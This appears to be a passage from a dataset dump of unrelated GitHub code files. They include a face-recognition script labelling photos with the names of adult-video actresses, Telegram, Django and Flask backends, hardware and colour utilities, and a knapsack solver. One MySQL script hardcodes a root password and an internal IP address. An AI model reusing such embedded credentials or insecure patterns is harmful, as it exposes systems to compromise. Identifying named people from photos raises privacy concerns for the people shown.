b_fc1\n\n # 최종 레이어에 softmax 함수는 적용하지 않았다.\n\n return h_fo\n\n\n# build cnn_graph\ndef build_model(images, keep_prob):\n # define CNN network graph\n # output shape will be (*,48,48,16)\n r_cnn1 = conv1(images) # convolutional layer 1\n # print(\"shape after cnn1 \", r_cnn1.get_shape())\n\n # output shape will be (*,24,24,32)\n r_cnn2 = conv2(r_cnn1) # convolutional layer 2\n # print(\"shape after cnn2 :\", r_cnn2.get_shape())\n\n # output shape will be (*,12,12,64)\n r_cnn3 = conv3(r_cnn2) # convolutional layer 3\n # print(\"shape after cnn3 :\", r_cnn3.get_shape())\n\n # output shape will be (*,6,6,128)\n r_cnn4 = conv4(r_cnn3) # convolutional layer 4\n # print(\"shape after cnn4 :\", r_cnn4.get_shape())\n\n # fully connected layer 1\n r_fc1 = fc1(r_cnn4)\n # print(\"shape after fc1 :\", r_fc1.get_shape())\n\n # fully connected layer2\n r_fc2 = fc2(r_fc1)\n # print(\"shape after fc2 :\", r_fc2.get_shape())\n\n ## drop out\n # 참고 http://stackoverflow.com/questions/34597316/why-input-is-scaled-in-tf-nn-dropout-in-tensorflow\n # 트레이닝시에는 keep_prob < 1.0 , Test 시에는 1.0으로 한다.\n r_dropout = tf.nn.dropout(r_fc2, keep_prob)\n # print(\"shape after dropout :\", r_dropout.get_shape())\n\n # final layer\n r_out = final_out(r_dropout)\n # print(\"shape after final layer :\", r_out.get_shape())\n\n return r_out\n\n\ndef build_graph_and_predict():\n # Start build a graph\n images = tf.placeholder(tf.float32, [None, FLAGS.image_size, FLAGS.image_size, FLAGS.image_color])\n keep_prob = tf.placeholder(tf.float32) # dropout ratio\n\n prediction = tf.nn.softmax(build_model(images, keep_prob))\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n saver.restore(sess, './models/face_recog1') # Load exist model\n\n\n # Start predict\n imagefile = input(\"Enter the location of image >>\")\n\n FLAGS.image_size = 96\n\n # set service account file into OS environment value\n # os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"./AV-Actor-Face-detecter-c1946c787efb.json\"\n #\n # visionClient = vision.Client()\n # print('[INFO] processing %s' % (imagefile))\n #\n # # detect face\n # image = visionClient.image(filename=imagefile)\n # faces = image.detect_faces()\n # face = faces[0]\n #\n # print('number of faces ', len(faces))\n #\n # # get face location in the photo\n # left = face.fd_bounds.vertices[0].x_coordinate\n # top = face.fd_bounds.vertices[0].y_coordinate\n # right = face.fd_bounds.vertices[2].x_coordinate\n # bottom = face.fd_bounds.vertices[2].y_coordinate\n # rect = [left, top, right, bottom]\n\n fDetector = FaceDetector()\n # rect = fDetector.detect_face(image_file=imagefile)\n rect = fDetector.detect_face_without_check_skew_angle(image_file=imagefile)\n\n print(\"rect : \", rect)\n\n fd = io.open(imagefile, 'rb')\n image = Image.open(fd)\n\n # display original image\n print(\"Original image\")\n # plt.imshow(image)\n # plt.show()\n\n # draw green box for face in the original image\n print(\"Detect face boundary box \")\n draw = ImageDraw.Draw(image)\n draw.rectangle(rect, fill=None, outline=\"green\")\n\n # plt.imshow(image)\n # plt.show()\n\n crop = image.crop(rect)\n im = crop.resize((FLAGS.image_size, FLAGS.image_size), Image.ANTIALIAS)\n # plt.show()\n imagename = imagefile.split('/')[-1]\n im.save('cropped/' + imagename)\n\n print(\"Cropped image\")\n tfimage = tf.image.decode_jpeg(tf.read_file('cropped/' + imagename), channels=3)\n tfimage_value = tfimage.eval()\n tfimages = []\n tfimages.append(tfimage_value)\n # plt.imshow(tfimage_value)\n # plt.show()\n fd.close()\n\n p_val = sess.run(prediction, feed_dict={images: tfimages, keep_prob: 1.0})\n name_labels = ['Airi Suzumura', 'Kana Momonogi', 'Kirara Asuka', 'Koharu Suzuki', 'Yura Sakura']\n i = 0\n for p in p_val[0]:\n print('%s %f' % (name_labels[i], float(p)))\n i = i + 1\n\n\nif __name__ == '__main__':\n build_graph_and_predict()\n","repo_name":"thanh109/AV-Actor-Finder","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":11375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12972642487","text":"import logging\nimport datetime\n\nfrom config.config_reader import load_config\nfrom config.configuration import Constants, Settings\n\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\n\nfrom bot import keyboards\nfrom bot.db import users\n\n\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram import Dispatcher, types\nfrom aiogram.dispatcher.filters import Text\n\n\nlogger = logging.getLogger(__name__)\nconfig = load_config(\"config/bot.ini\")\n\n\nclass EditSettings(StatesGroup):\n waiting_for_choose_what_edit = State()\n\n\nasync def register_user(message: types.Message, state: FSMContext):\n now_date = datetime.datetime.now().strftime(Settings.date_format).split()[0]\n # Добавить выбор языка\n uts_select = await message.answer(Constants.settings_text[\"selecting_utc\"][\"ru\"],\n parse_mode=\"HTML\", reply_markup=keyboards.inline_kb_utc)\n await state.update_data(message_id=uts_select.message_id)\n\n users.add_user(str(message.from_user.id), str(message.chat.id), 'ru', 0, \"not_set\", now_date)\n logger.warning(\"Registered new user. user_id: {0}, chat_id: {1}, user_name: {2}\".format(message.from_user.id,\n message.chat.id,\n message.from_user.username))\n start = Constants.user_commands.get(\"start\")\n await message.answer(start[\"text\"][\"ru\"].format(bot_name=config.bot.name), parse_mode=\"HTML\",\n reply_markup=keyboards.kb_main_menu)\n await message.answer(Constants.settings_text[\"check_examples\"][\"ru\"], parse_mode=\"HTML\")\n\n\nasync def cmd_settings(message: types.Message, state: FSMContext):\n data = users.get_user_data(message.chat.id)\n if data[5] == \"not_set\":\n uts_select = await message.answer(Constants.settings_text[\"selecting_utc\"][\"ru\"], parse_mode=\"HTML\",\n reply_markup=keyboards.inline_kb_utc)\n return await state.update_data(message_id=uts_select.message_id)\n\n settings = Constants.user_commands.get(\"settings\")\n await message.answer(settings[\"text\"][\"ru\"].format(registered=data[6], reminders_sent=data[4],\n language=\"🇷🇺 русский\", time_zone=data[5]),\n parse_mode=\"HTML\", reply_markup=keyboards.inline_kb_edit_settings)\n\n await EditSettings.waiting_for_choose_what_edit.set()\n\n\nasync def set_utc(call: types.CallbackQuery, state: FSMContext):\n data = await state.get_data()\n await state.finish()\n if data.get(\"message_id\"):\n await call.bot.delete_message(call.message.chat.id, data[\"message_id\"])\n\n time_zone = call.data.split()[1]\n\n users.update_time_zone(call.message.chat.id, time_zone)\n logger.debug(\"User {0} set time_zone {1}.\".format(call.message.chat.id, time_zone))\n await call.message.answer(Constants.settings_text[\"utc_set\"][\"ru\"].format(time_zone=time_zone),\n parse_mode=\"HTML\", reply_markup=keyboards.kb_main_menu)\n\n\nasync def edit_time_zone(call: types.CallbackQuery, state: FSMContext):\n await state.finish()\n uts_select = await call.message.answer(Constants.settings_text[\"selecting_utc\"][\"ru\"], parse_mode=\"HTML\",\n reply_markup=keyboards.inline_kb_utc)\n await state.update_data(message_id=uts_select.message_id)\n\n\ndef register_handlers_settings(dp: Dispatcher):\n dp.register_message_handler(cmd_settings, commands=\"settings\", state=\"*\")\n dp.register_callback_query_handler(edit_time_zone, text=\"edit_time_zone\", state=EditSettings.waiting_for_choose_what_edit)\n dp.register_callback_query_handler(set_utc, text=Settings.callback_utc_data, state='*')\n\n","repo_name":"Yastrah/Telegram-bot-Notify","sub_path":"bot/handlers/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71465269994","text":"import math\nimport time\nfrom colorsys import hsv_to_rgb\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Tuple\n\nimport busio\nfrom adafruit_neotrellis.neotrellis import NeoTrellis\nfrom board import SCL, SDA\n\nBUTTON_COUNT = 16\n\nFRAME_RATE = 30\nSLEEP_TIME = 30 / 1000.0\n\nFloatColor = Tuple[float, float, float]\nByteColor = Tuple[int, int, int]\n\n\ndef float_to_byte_color(float_color: FloatColor) -> ByteColor:\n return (\n int(float_color[0] * 255),\n int(float_color[1] * 255),\n int(float_color[2] * 255),\n )\n\n\ndef sin_time(cadence: float) -> float:\n return (math.sin(time.time() * cadence) + 1.0) / 2.0\n\n\ndef cos_time(cadence: float) -> float:\n return (math.cos(time.time() * cadence) + 1.0) / 2.0\n\n\ndef button_callback(trellis: NeoTrellis, i: int) -> Callable[..., Any]:\n def _button_callback(event):\n if event.edge == NeoTrellis.EDGE_FALLING:\n trellis.pixels[event.number] = (0, 0, 0)\n elif event.edge == NeoTrellis.EDGE_RISING:\n trellis.pixels[event.number] = (255, 0, 127)\n return _button_callback\n\n\ndef button_target_color(i: int) -> ByteColor:\n OUTER_RING = {0, 1, 2, 3, 4, 7, 8, 11, 12, 13, 14, 15}\n INNER_RING = {5, 6, 9, 10}\n\n if i in OUTER_RING:\n float_color = hsv_to_rgb(sin_time(0.25), 0.8, 0.8)\n if i in INNER_RING:\n float_color = hsv_to_rgb(cos_time(0.25), 0.8, 0.8)\n\n return float_to_byte_color(float_color)\n\n\ndef main(trellis: NeoTrellis):\n for i in range(BUTTON_COUNT):\n trellis.activate_key(i, NeoTrellis.EDGE_RISING)\n trellis.activate_key(i, NeoTrellis.EDGE_FALLING)\n trellis.callbacks[i] = button_callback(trellis, i)\n\n while True:\n for i in range(BUTTON_COUNT):\n trellis.pixels[i] = button_target_color(i)\n\n trellis.sync()\n time.sleep(0.02)\n\n\nif __name__ == \"__main__\":\n i2c = busio.I2C(SCL, SDA)\n trellis = NeoTrellis(i2c)\n try:\n main(trellis)\n except KeyboardInterrupt:\n for i in range(BUTTON_COUNT):\n trellis.pixels[i] = (0, 0, 0)\n","repo_name":"crockeo/crockeo-trellis","sub_path":"app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41478838891","text":"#!/usr/bin/python3\nimport mysql.connector\nimport webbrowser\n\nconn = mysql.connector.connect(user='root', password='SAVEearth16$',\n host='10.0.1.168',database='cust_details')\n\nif conn:\n print (\"Connected Successfully\")\nelse:\n print (\"Connection Not Established\")\n\nselect_employee = \"\"\"SELECT * FROM employee\"\"\"\ncursor = conn.cursor()\ncursor.execute(select_employee)\nresult = cursor.fetchall()\n\n\np = []\n\ntbl = print (\"First NameLast Name\")\np.append(tbl)\n\nfor row in result:\n a = \"%s\"%row[0]\n print (\"p.append(a)\")\n b = \"%s\"%row[1]\n print(\"p.append(b)\")\n\n\n\nif(conn.is_connected()):\n cursor.close()\n conn.close()\n print(\"MySQL connection is closed.\") \n","repo_name":"midhunmenon99-hub/public_submit-form_private_database","sub_path":"cgi-enabled/newpython.py","file_name":"newpython.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30906826940","text":"\nfrom django.shortcuts import render,HttpResponse\nfrom rest_framework.response import Response\nfrom staff_admin.models import *\nfrom staff_app.serialize import *\nfrom employee_web import *\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.pagination import PageNumberPagination\n\nfrom rest_framework.decorators import api_view\nfrom django.db.models import Q\n#from . permission import IsAdmin,IsCompany,IsJobSeeker\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import authentication_classes,permission_classes\nimport random\nimport datetime \nfrom django.conf import settings\nfrom staff_app.helpers import get_object, sendSMS,timeSheetValidation\nfrom twilio.rest import Client\n\nfrom staff_app.permission import IsCompany,IsJobSeeker\nfrom .helpers import *\nfrom_mail=settings.EMAIL_HOST_USER\n\nfrom_no=settings.TWILIO_NUMBER\nsms_sid=settings.TWILIO_ACCOUNT_SID\nsms_token=settings.TWILIO_AUTH_TOKEN\nimport json\nimport uuid\nfrom base64 import b64decode\nfrom django.core.files.base import ContentFile \n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker])\ndef shiftListByStatus(request):\n if request.method=='GET':\n set_pending()\n usr=request.user\n paginat=PageNumberPagination()\n paginat.page_size=10\n paginat.page_size_query_param='page_size'\n \n try:\n val=request.GET.get('shift_list')\n \n except:\n pass\n now_date=datetime.now()\n # now_date=now_datetime.date()\n # now_time=now_datetime.time()\n \n if val=='booked':\n print(now_date)\n ob=Shift_Post.objects.filter(applicant=usr).exclude(in_time__lte=now_date)\n print(ob)\n obj=Shift_Post.objects.filter(applicant=usr).filter(accepted=True,status=True).exclude(in_time__lte=now_date).order_by('-create_at')\n result_obj=paginat.paginate_queryset(obj,request)\n sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr,'request':request})\n \n elif val=='completed':\n obj=Shift_Post.objects.filter(applicant=usr).filter(completed=True,status=True,accepted=True).order_by('-create_at')\n \n result_obj=paginat.paginate_queryset(obj,request)\n sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr ,'request':request})\n elif val=='available':\n obj=Shift_Post.objects.exclude(completed=True).exclude(accepted=True).exclude(pending=True).exclude(status=False).exclude(time_sheet=True).order_by('-create_at')\n result_obj=paginat.paginate_queryset(obj,request)\n sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr,'request':request})\n\n elif val=='timesheet':\n \n \n \n obj=Shift_Post.objects.filter(applicant=usr).filter(accepted=True,status=True).filter(in_time__lte=now_date).order_by('-create_at')\n result_obj=paginat.paginate_queryset(obj,request)\n sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr,'request':request})\n\n else:\n return Response({\n 'status':0,\n 'message':'Please send correct key',\n 'data':[],\n \n })\n\n t=sez.data\n response=paginat.get_paginated_response(t)\n response.data['message']='data fetch succsfully'\n response.data['status']=1\n return Response(response.data)\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker])\ndef shiftBooking(request):\n if request.method=='GET': \n id=request.GET.get('id')\n usr=request.user\n now_date=datetime.now()\n a=json.loads(id)\n try:\n shift_obj=Shift_Post.objects.get(id=a)\n except:\n return Response({\n 'status':1,\n 'message':'Successfully ! id does not exist ',\n 'data':[]\n \n })\n try:\n check_time=TimeSheet.objects.get(shift=shift_obj)\n except:\n emp_obj=shift_obj.employee\n time_obj=TimeSheet.objects.create(applicant=usr,shift=shift_obj,employee=emp_obj)\n \n if a: \n shift_obj.accepted=True\n shift_obj.applicant=usr\n shift_obj.save()\n emp_user=shift_obj.employee\n try:\n send_app_pdf(emp_user)\n except:\n pass\n return Response({\n 'status':1,\n 'message':'Successfully ! shift booked',\n 'data':[]\n \n })\n else:\n return Response({\n 'status':1,\n 'message':'Successfully ! something is wrong ',\n 'data':[]\n \n })\n\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker])\ndef shiftBookingCancel(request):\n if request.method=='GET':\n \n shift_id=request.GET.get('shift_id')\n ids=json.loads(shift_id)\n try:\n obj=Shift_Post.objects.get(id=ids)\n except:\n return Response({\n 'status':0,\n 'message':'shift id does not exist',\n 'data':[]\n \n })\n\n obj.accepted=False\n obj.save()\n\n\n\n return Response({\n 'status':1,\n 'message':'Successfully ! shift Cancel',\n 'data':[]\n \n })\n\n\n\n\n\n\n@csrf_exempt\n@api_view(['POST'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef applicantDetails(request):\n if request.method=='POST':\n usr=request.user\n data=request.data\n print(request.data)\n print(request.FILES,'-----------')\n try:\n \n vaccinate=request.data['vaccinated']\n x={1:'Fully Vaccinated', 2:'Not Vaccinated' ,3:'Partially Vaccinated'}\n z=x[int(vaccinate)]\n except:\n z=None\n \n try:\n img=request.FILES.get('image')\n print(img,\"fffffffffffffffffffffff\")\n except:\n img=None\n \n try:\n \n app_obj=ApplicantDeatails.objects.get(user=usr)\n token, created = Token.objects.get_or_create(user=usr)\n user_info=user_details(usr,token,usr_request=request)\n return Response({\n 'status':0,\n 'message':'User Already Update details',\n 'data':user_info})\n except:\n\n sez=ApplicantDeatailSerialize(data=data,context={'request':request})\n token, created = Token.objects.get_or_create(user=usr)\n \n if sez.is_valid(raise_exception=False):\n sez.save(user=usr,vaccinated=z,image=img)\n \n token, created = Token.objects.get_or_create(user=usr)\n \n user_info=user_details(usr,token)\n try:\n obj=User.objects.get(id=usr.id)\n obj.company_profile_status=True\n obj.save()\n except:\n pass\n return Response({\n 'status':1,\n 'message':'Successfully ! update data',\n 'data':user_info\n \n })\n else: \n \n for i in sez.errors:\n a=0\n l=sez.errors[i]\n s=f'{i}-{l[0]}'\n a+=1\n if a==1:\n response = {\n 'status': 0,\n 'message':s,\n\n 'data': []\n }\n\n return Response(response)\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef shift_details(request):\n if request.method=='GET':\n a=request.GET.get('id')\n usr=request.user\n try:\n obj=Shift_Post.objects.get(id=a)\n except:\n return Response({\n 'status':0,\n 'message':'Shift POST does not exist',\n 'data':[],\n \n })\n sez=ShiftDetailSerialize(obj,context={'current_user':usr})\n return Response({\n 'status':1,\n 'message':'Successfully ! fatch data',\n 'data':sez.data,\n \n })\n\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef timeSheet(request):\n if request.method=='GET':\n usr=request.user\n obj=Shift_Post.objects.filter(applicant=usr,accepted=True,time_sheet=False)\n sez=TimeSheetSerialize(obj,many=True)\n return Response({\n 'status':1,\n 'message':'Successfully dsds! fatch data',\n 'data':sez.data\n \n })\n\n@csrf_exempt\n@api_view(['POST'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef submitTimeSheet(request):\n if request.method=='POST':\n usr=request.user\n data=request.data\n \n \n id=request.data['shift']\n shift_id=json.loads(id)\n\n print(data)\n try:\n obj=TimeSheet.objects.get(shift_id=shift_id)\n except:\n return Response({\n 'status':0,\n 'message':'Shift id does not exist',\n 'data':[]\n })\n if obj.submit_status:\n return Response({\n 'status':0,\n 'message':'Already ! submit Time Sheet',\n 'data':[]\n })\n\n sez=TimeSheetSubmitSerialize(instance=obj,data=data,context={'request':request})\n if sez.is_valid():\n sez.save(submit_status=True)\n obj.shift.time_sheet=True\n obj.save()\n return Response({\n 'status':1,\n 'message':'Successfully! data update',\n 'data':sez.data\n \n })\n else:\n for i in sez.errors:\n a=0\n l=sez.errors[i]\n s=f'{i}-{l[0]}'\n a+=1\n if a==1:\n response = {\n 'status': 0,\n 'message':s,\n\n 'data': []\n }\n\n return Response(response)\n\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef timeSheetStatus(request):\n if request.method=='GET':\n usr=request.user\n print(usr.id)\n obj=TimeSheet.objects.filter(user=usr,submit_status=True)\n sez=TimeSheetStatus(obj,many=True)\n return Response({\n 'status':1,\n 'message':'Successfully! fatch',\n 'data':sez.data\n \n })\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef postListForTimeSheet(request):\n usr=request.user\n\n obj=Shift_Post.objects.filter(applicant=usr,completed=False,time_sheet=False)\n sez=ApplcantShiftSerialize(obj,many=True,context={'current_user':usr})\n return Response({\n 'status':1,\n 'message':'Successfully! Fatch data',\n 'data':sez.data\n \n })\n\n\n\n\n\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef likeShift(request):\n if request.method=='GET':\n usr=request.user\n try:\n id=request.GET.get('shift_id')\n except:\n return Response({\n 'status':0,\n 'message':'Please Send Correct Send Key and Value',\n 'data':[]\n \n })\n shift_id=json.loads(id)\n try:\n obj=ShiftLike.objects.get(shift=shift_id)\n except:\n obj=ShiftLike.objects.create(user=usr,shift_id=shift_id)\n if obj.like:\n obj.delete()\n else:\n obj.like=True\n obj.save()\n obj1=obj.shift\n sez=ApplcantShiftSerialize(obj1,context={'current_user':usr})\n return Response({\n 'status':1,\n 'message':'Successfully! Add Post in Your Favorite List',\n 'data':sez.data\n \n })\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef favoriteList(request):\n if request.method=='GET':\n usr=request.user\n paginat=PageNumberPagination()\n paginat.page_size=10\n paginat.page_size_query_param='page_size'\n try:\n obj=ShiftLike.objects.filter(user=usr)\n except:\n obj=None\n if obj:\n l=list()\n for i in obj:\n l.append(i.shift)\n \n result_obj=paginat.paginate_queryset(l,request)\n sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr})\n # sez=ApplcantShiftSerialize(l,many=True,context={'current_user':usr})\n t=sez.data\n response=paginat.get_paginated_response(t)\n response.data['message']='data fetch succsfully'\n response.data['status']=1\n return Response(response.data)\n else:\n return Response({\n 'status':1,\n 'message':'Not availbler any list ',\n 'data':[]\n \n })\n\n","repo_name":"devtech2019/python","sub_path":"staff_hiring/staff_app/view2.py","file_name":"view2.py","file_ext":"py","file_size_in_byte":18957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7606730199","text":"from common import *\n\n\n\n\n#########################################\n# Colouring for the terminal / console\n#########################################\nimport colorama\ncolorama.init() # Makes stdout/err color codes work on windows too.\nfrom colorama import Fore as cFG # Foreground color codes\nfrom colorama import Back as cBG # Background color codes\n\nimport contextlib\n@contextlib.contextmanager\ndef coloring(*color_codes):\n \"\"\"\n Color printing using 'with'. Example:\n >>> with coloring(cFG.GREEN): print(\"This is in color\")\n \"\"\"\n if len(color_codes)==0:\n color_codes = [colorama.Style.BRIGHT, cFG.BLUE]\n\n print(*color_codes, end=\"\")\n yield \n print(colorama.Style.RESET_ALL, end=\"\", flush=True)\n\n\ndef print_c(*args,color='blue',**kwargs):\n \"\"\"Print with color.\n But I prefer using the coloring context manager defined above.\"\"\"\n s = ' '.join([str(k) for k in args])\n print(termcolors[color] + s + termcolors['ENDC'],**kwargs)\n\n# Terminal color codes. Better to use colorama (above) instead.\ntermcolors={\n 'blue' : '\\033[94m',\n 'green' : '\\033[92m',\n 'OKblue' : '\\033[94m',\n 'OKgreen' : '\\033[92m',\n 'WARNING' : '\\033[93m',\n 'FAIL' : '\\033[91m',\n 'ENDC' : '\\033[0m' ,\n 'header' : '\\033[95m',\n 'bold' : '\\033[1m' ,\n 'underline' : '\\033[4m' ,\n}\n\n\n#########################################\n# Colouring for matplotlib\n#########################################\nsns_bg = array([0.9176, 0.9176, 0.9490])\n\n# Standard color codes\nRGBs = {c: array(mpl.colors.colorConverter.to_rgb(c)) for c in 'bgrmyckw'}\n#RGBs = [mpl.colors.colorConverter.to_rgb(c) for c in 'bgrmyckw']\n\n# Matlab (new) colors.\nml_colors = np.array(np.matrix(\"\"\"\n 0 0.4470 0.7410;\n0.8500 0.3250 0.0980;\n0.9290 0.6940 0.1250;\n0.4940 0.1840 0.5560;\n0.4660 0.6740 0.1880;\n0.3010 0.7450 0.9330;\n0.6350 0.0780 0.1840 \n\"\"\"))\n# Load into matplotlib color dictionary\nfor code, color in zip('boyvgcr', ml_colors):\n mpl.colors.ColorConverter.colors['ml'+code] = color\n mpl.colors.colorConverter.cache ['ml'+code] = color\n\n# Seaborn colors\nsns_colors = np.array(np.matrix(\"\"\"\n0.298 , 0.447 , 0.690 ; \n0.333 , 0.658 , 0.407 ; \n0.768 , 0.305 , 0.321 ; \n0.505 , 0.447 , 0.698 ; \n0.8 , 0.725 , 0.454 ; \n0.392 , 0.709 , 0.803 ; \n0.1 , 0.1 , 0.1 ; \n1.0 , 1.0 , 1.0 \n\"\"\"))\n# Overwrite default color codes\nfor code, color in zip('bgrmyckw', sns_colors):\n mpl.colors.colorConverter.colors[code] = color\n mpl.colors.colorConverter.cache [code] = color\n\n\ndef blend_rgb(rgb, a, bg_rgb=ones(3)):\n \"\"\"\n Fake RGB transparency by blending it to some background.\n Useful for creating gradients.\n\n Also useful for creating 'transparency' for exporting to eps.\n But there's no actualy transparency, so superposition of lines\n will not work. For that: export to pdf, or make do without.\n\n - rgb: N-by-3 rgb, or a color code.\n - a: alpha value\n - bg_rgb: background in rgb. Default: white\n Based on stackoverflow.com/a/33375738/38281\n \"\"\" \n if isinstance(rgb,str):\n rgb = mpl.colors.colorConverter.to_rgb(rgb)\n return [a*c1 + (1-a)*c2 for (c1, c2) in zip(rgb, bg_rgb)]\n\n\n","repo_name":"franktoffel/dapper","sub_path":"tools/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"6523956689","text":"from flask import render_template\nimport pandas as pd\nimport time\nimport redis\nimport prometheus_client\nfrom prometheus_client import Counter\nfrom flask import Response, Flask, jsonify\nfrom bson import json_util\nfrom flask_pymongo import PyMongo\nimport pymongo\nfrom pymongo import MongoClient\nfrom flask import stream_with_context, request\nfrom flask_cors import CORS\nimport json\nfrom app_init import create_app\nimport os\n\nconfig_name = os.getenv('FLASK_CONFIG')\napp, cache, client = create_app(config_name)\n\n\n# app = Flask(__name__)\n# CORS(app)\n# cache = redis.Redis(host='redis', port=6379)\n# # use command 'docker inspect {mongo-container-name}' to find Gateway\n# # Making a Connection with MongoClient\n# #client = MongoClient(\"mongodb://localhost:27017/\")\n#client = MongoClient(\"mongodb://172.19.0.1:27018/\")\n# database\ndb = client[\"medical_data\"]\n# collection\ncompany = db[\"hospital_data\"]\ndf = pd.read_csv(\n './modules_under_development/1.write_data_to _mongodb/hospbsc.csv')\ncompany.insert_many(df.to_dict('record'))\n\n# mongo = PyMongo(app, uri=\"mongodb://172.19.0.1:27017/drug_data\")\ntotal_requests = Counter('request_count', 'Total webapp request count')\n\n# TODO:\n# add patients CRUD\n\n\ndef get_hit_count():\n retries = 5\n while True:\n try:\n return cache.incr('hits')\n except redis.exceptions.ConnectionError as exc:\n if retries == 0:\n raise exc\n retries -= 1\n time.sleep(0.5)\n\n\n@app.route('/hits')\ndef get_index():\n count = get_hit_count()\n return '這是你第 {} 參訪\\n'.format(count)\n\n\n@app.route('/metrics')\ndef requests_count():\n total_requests.inc()\n return Response(prometheus_client.generate_latest(total_requests), mimetype='text/plain')\n\n\n@app.route('/')\ndef index():\n total_requests.inc()\n return jsonify({\n 'status': 'ok'\n })\n\n# todo:\n# replace NaN in database\n# because NaN is not a valid value in json.\n\n\n@app.route('/hospital_info/', methods=['GET', 'POST'])\ndef hospital_info(hospital_number):\n record = company.find_one({\"醫事機構代碼\": hospital_number})\n\n if '_id' in record:\n del record['_id']\n # records=json.dumps(record, ensure_ascii=True)\n # # encode json to utf-8\n # encoded_data = records.encode('utf-8')\n encoded_data = jsonify(record)\n return encoded_data\n\n\n@app.route('/member', methods=['GET'])\ndef member():\n print()\n return jsonify({'hello': 'world'})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"J0hnLee/pharmX_old","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32067663978","text":"\n# MAX KNAPSACK\n\n# verwendet sol_max_ks, m_max_ks\nfrom c02_1_max_ks_exh import sol_max_ks, m_max_ks\n\n# vereinfachtes Backtracking-Kriterium:\n# Teilloesung noch zulaessig?\ndef K_max_ks(s,v,S,t):\n size = 0\n for i in range(len(t)): # Größen der Gegenstände addieren \n if t[i] == 1:\n size += s[i]\n \n if size <= S: # Überprüfen ob Maximalgröße überschritten\n return True\n\n return False\n\n# Entwurfsmuster Backtracking\ndef max_ks_backtracking(s,v,S):\n opt = -1 # optimaler Wert\n m = len(s) # Anzahl der Gegenstände\n M = {()} # Menge der aktiven Knoten\n # () = Wurzel\n while M:\n t_prev = M.pop() # beliebigen Knoten entnehmen\n for a in range(2): # nächsten Gegenstand mitnehmen oder nicht\n t = t_prev + (a,) # neues Tupel\n if len(t) == m:\n if sol_max_ks(s,v,S,t): # überprüfe ob t zulässige Lösung ist\n value = m_max_ks(s,v,S,t)\n if value > opt: # überprüfe ob t neue beste Lösung ist\n opt = value\n\n else:\n if K_max_ks(s,v,S,t):\n M.add(t)\n else:\n pass\n return opt\n\n\n# Bsp m=4, S=7\nif __name__ == \"__main__\":\n print(max_ks_backtracking([3,2,1,5,1,3,2,4],[3,1,1,4,4,5,3,7],10))\n print(max_ks_backtracking([3,8,1,5],[3,1,1,4],8))\n","repo_name":"MMueller98/Algorithmen-Design-Python","sub_path":"Code/c02_2_max_ks_bt.py","file_name":"c02_2_max_ks_bt.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39063361462","text":"#!/usr/bin/env python3\n\nfrom collections import namedtuple, deque, defaultdict, OrderedDict, Counter\n\nPoint = namedtuple('Point', ['x', 'y'])\np = Point(1, 2)\nprint(p.x)\nprint(p.y)\n\nprint(isinstance(p, Point))\nprint(isinstance(p, tuple))\n\nCircle = namedtuple('Circle', ['x', 'y', 'r'])\n\nq = deque(['a', 'b', 